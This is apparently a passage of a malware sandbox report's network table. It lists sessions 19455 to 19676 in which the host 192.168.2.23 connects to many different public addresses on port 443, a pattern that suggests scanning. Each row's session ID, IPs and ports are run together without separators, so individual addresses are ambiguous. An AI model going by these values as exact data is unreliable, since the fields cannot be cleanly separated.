                                            19455192.168.2.2357486130.235.71.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19456192.168.2.2355184105.72.226.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19457192.168.2.2357638218.227.76.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19458192.168.2.2334818184.29.167.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19459192.168.2.234356680.228.198.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19460192.168.2.234548491.118.208.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19461192.168.2.2353108130.255.79.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19462192.168.2.2334694156.165.237.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19463192.168.2.2349434181.5.255.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19464192.168.2.233602839.10.131.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19465192.168.2.234409295.195.196.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19466192.168.2.2337236126.194.72.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19467192.168.2.2338734194.204.240.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19468192.168.2.2343142219.99.163.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19469192.168.2.2344582160.207.155.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19470192.168.2.234075058.109.196.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19471192.168.2.2345826106.224.153.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19472192.168.2.2342394163.55.160.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19473192.168.2.2347672149.69.12.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19474192.168.2.2342056169.212.50.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19475192.168.2.235692449.2.35.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19476192.168.2.2358544197.169.185.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19477192.168.2.2344530194.84.112.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19478192.168.2.235191082.62.31.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19479192.168.2.2346138191.18.43.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19480192.168.2.2336182205.207.187.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19481192.168.2.234762820.114.197.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19482192.168.2.234483251.72.104.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19483192.168.2.2340306194.7.255.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19484192.168.2.233355225.30.253.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19485192.168.2.234345443.85.90.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19486192.168.2.2342864211.151.13.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19487192.168.2.234836474.112.6.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19488192.168.2.235665897.223.76.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19489192.168.2.2352426175.12.43.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19490192.168.2.234732647.1.134.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19491192.168.2.2346036202.32.3.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19492192.168.2.2334930104.206.149.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19493192.168.2.233749270.151.102.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19494192.168.2.2354672179.246.99.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19495192.168.2.2348396156.101.156.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19496192.168.2.2355152176.245.169.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19497192.168.2.2350318209.49.67.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19498192.168.2.2349592221.40.229.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19499192.168.2.2347454201.188.230.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19500192.168.2.2347122167.11.54.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19501192.168.2.2335426193.63.246.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19502192.168.2.2355030148.135.227.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19503192.168.2.2333780105.160.224.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19504192.168.2.234644667.29.127.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19505192.168.2.2360604151.136.89.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19506192.168.2.2355676179.199.218.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19507192.168.2.2348754146.9.3.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19508192.168.2.235648812.72.235.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19509192.168.2.2354562199.225.186.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19510192.168.2.2347044175.138.96.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19511192.168.2.2338262123.73.225.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19512192.168.2.2360104134.7.158.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19513192.168.2.2349488222.137.214.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19514192.168.2.235981099.79.35.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19515192.168.2.2335616118.82.78.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19516192.168.2.235466223.85.154.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19517192.168.2.2353266122.100.177.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19518192.168.2.23387805.27.36.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19519192.168.2.2345230102.114.232.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19520192.168.2.2338716213.161.42.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19521192.168.2.2345210146.75.186.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19522192.168.2.2351932178.171.156.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19523192.168.2.2340080136.9.247.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19524192.168.2.235587470.47.233.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19525192.168.2.235989018.160.112.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19526192.168.2.2352646162.63.58.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19527192.168.2.2334918151.110.6.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19528192.168.2.2348906193.170.102.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19529192.168.2.2356770193.175.74.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19530192.168.2.2334472145.62.19.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19531192.168.2.233451636.79.80.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19532192.168.2.2335078197.33.133.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19533192.168.2.2348366195.129.124.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19534192.168.2.2355068217.105.165.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19535192.168.2.233453481.226.64.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19536192.168.2.235529694.245.60.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19537192.168.2.2343864180.180.182.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19538192.168.2.2339142171.153.65.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19539192.168.2.2354070114.44.177.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19540192.168.2.2360680163.216.84.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19541192.168.2.235262044.34.50.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19542192.168.2.233458897.76.145.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19543192.168.2.2356146212.154.104.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19544192.168.2.2355876143.172.177.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19545192.168.2.235336078.79.31.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19546192.168.2.234524095.137.194.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19547192.168.2.2333340220.200.107.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19548192.168.2.235057266.55.157.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19549192.168.2.2347082118.203.25.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19550192.168.2.235892253.22.132.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19551192.168.2.2335968196.6.15.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19552192.168.2.2339872133.251.162.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19553192.168.2.234578661.79.217.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19554192.168.2.235447613.187.172.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19555192.168.2.233538293.129.51.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19556192.168.2.2347280197.253.106.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19557192.168.2.233959069.56.87.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19558192.168.2.2342756209.168.161.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19559192.168.2.2333696192.109.212.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19560192.168.2.2335868106.197.228.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19561192.168.2.233862285.23.64.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19562192.168.2.234648849.11.249.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19563192.168.2.234704298.242.29.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19564192.168.2.233346481.198.142.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19565192.168.2.2336810104.65.3.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19566192.168.2.234669032.29.69.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19567192.168.2.2336486196.130.38.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19568192.168.2.2342944105.79.249.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19569192.168.2.2337800120.20.120.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19570192.168.2.2335590102.101.88.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19571192.168.2.236072695.141.204.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19572192.168.2.233322658.112.248.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19573192.168.2.235552814.69.203.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19574192.168.2.233910435.68.41.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19575192.168.2.2360032167.118.176.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19576192.168.2.234217498.105.178.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19577192.168.2.2357476108.183.5.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19578192.168.2.2348448184.223.237.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19579192.168.2.2335164217.50.227.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19580192.168.2.2356760137.82.177.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19581192.168.2.2345484181.3.90.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19582192.168.2.2357202197.2.126.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19583192.168.2.2355290179.211.210.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19584192.168.2.2359310178.214.125.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19585192.168.2.233922025.45.45.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19586192.168.2.2358268173.244.119.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19587192.168.2.2339258145.93.71.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19588192.168.2.233338447.153.198.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19589192.168.2.2349102108.105.119.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19590192.168.2.2357408223.2.136.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19591192.168.2.233428031.170.219.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19592192.168.2.234614618.90.120.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19593192.168.2.2351216175.18.248.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19594192.168.2.235469260.193.47.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19595192.168.2.233650674.160.177.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19596192.168.2.2336692199.135.4.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19597192.168.2.235951294.171.197.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19598192.168.2.2354230149.188.7.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19599192.168.2.234800864.56.105.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19600192.168.2.2334072103.153.13.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19601192.168.2.235706288.152.93.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19602192.168.2.2359948107.215.101.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19603192.168.2.2344752158.32.174.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19604192.168.2.235762888.226.142.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19605192.168.2.2351320162.153.201.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19606192.168.2.234695613.147.200.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19607192.168.2.235426234.164.216.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19608192.168.2.233676698.68.187.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19609192.168.2.23585122.212.209.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19610192.168.2.2350998189.193.215.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19611192.168.2.2359110172.137.154.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19612192.168.2.234360271.13.24.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19613192.168.2.233476824.93.244.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19614192.168.2.2345370221.251.175.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19615192.168.2.2352490187.112.14.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19616192.168.2.2355100217.134.84.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19617192.168.2.2342658197.22.49.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19618192.168.2.233784018.71.207.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19619192.168.2.2341548222.86.181.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19620192.168.2.2356222162.131.186.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19621192.168.2.2344626175.90.51.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19622192.168.2.2353292192.236.2.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19623192.168.2.2337460211.109.54.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19624192.168.2.2344668208.21.36.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19625192.168.2.23329845.9.219.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19626192.168.2.235916027.221.131.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19627192.168.2.2349900117.158.189.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19628192.168.2.2340346159.144.225.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19629192.168.2.2352456216.40.116.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19630192.168.2.2341994150.70.212.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19631192.168.2.2338322100.209.56.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19632192.168.2.2351498125.167.57.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19633192.168.2.2355250191.206.33.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19634192.168.2.2346644103.65.132.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19635192.168.2.2332786112.26.141.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19636192.168.2.2352598202.56.52.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19637192.168.2.235703040.124.32.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19638192.168.2.2355892172.175.222.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19639192.168.2.235364870.86.219.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19640192.168.2.2335134108.18.112.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19641192.168.2.235368853.249.67.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19642192.168.2.2356570147.122.16.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19643192.168.2.2333176202.118.246.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19644192.168.2.2354564222.207.18.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19645192.168.2.2349446211.204.20.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19646192.168.2.2338010223.233.180.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19647192.168.2.233338664.85.46.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19648192.168.2.2333336213.7.76.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19649192.168.2.233969450.227.115.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19650192.168.2.2336364201.196.14.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19651192.168.2.2348002142.111.108.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19652192.168.2.2348598101.33.78.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19653192.168.2.2340484210.80.13.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19654192.168.2.2335010197.185.168.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19655192.168.2.234204658.252.1.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19656192.168.2.2351554126.215.209.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19657192.168.2.2358510141.228.237.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19658192.168.2.2357762139.123.78.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19659192.168.2.2335282153.99.83.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19660192.168.2.235792090.126.48.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19661192.168.2.2353184221.60.106.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19662192.168.2.234982614.39.122.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19663192.168.2.2348646134.171.97.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19664192.168.2.2358166106.189.222.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19665192.168.2.2341466113.63.54.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19666192.168.2.2333380157.76.159.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19667192.168.2.2333370220.188.238.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19668192.168.2.2342490206.62.22.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19669192.168.2.234114094.204.253.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19670192.168.2.2344206196.1.60.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19671192.168.2.235766875.161.183.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19672192.168.2.235874650.103.231.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19673192.168.2.2355562164.225.247.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19674192.168.2.2357796178.83.167.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19675192.168.2.2334188123.179.128.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19676192.168.2.23384942.108.191.124443
                                            TimestampBytes transferredDirectionData


